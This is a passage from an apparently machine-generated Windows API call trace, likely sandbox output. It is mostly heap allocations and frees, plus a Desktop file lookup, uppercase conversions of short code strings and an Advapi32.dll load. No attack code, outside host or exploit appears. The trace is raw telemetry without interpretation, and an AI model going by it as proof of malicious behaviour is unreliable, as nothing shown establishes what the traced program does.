(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0162.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.741] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0162.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0162.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.741] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0162.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0162.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.742] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/d1NqFAAxwvSf3pfr2yZp.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x959a8ee0, ftCreationTime.dwHighDateTime=0x1d4d519, ftLastAccessTime.dwLowDateTime=0x51ef5600, ftLastAccessTime.dwHighDateTime=0x1d4d260, ftLastWriteTime.dwLowDateTime=0x51ef5600, ftLastWriteTime.dwHighDateTime=0x1d4d260, nFileSizeHigh=0x0, nFileSizeLow=0xd16c, dwReserved0=0x8900006, dwReserved1=0xd8f8, cFileName="d1NqFAAxwvSf3pfr2yZp.gif", cAlternateFileName="D1NQFA~1.GIF")) returned 0xaa56a0 [0162.743] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.743] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0162.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0162.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0162.745] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0162.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0162.745] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0162.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.746] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0162.746] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0162.746] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0162.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.746] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0162.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0162.746] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.747] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0162.747] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0162.747] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0162.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0162.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0162.749] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0162.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0162.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.750] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0162.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.751] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.751] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0162.751] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0162.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 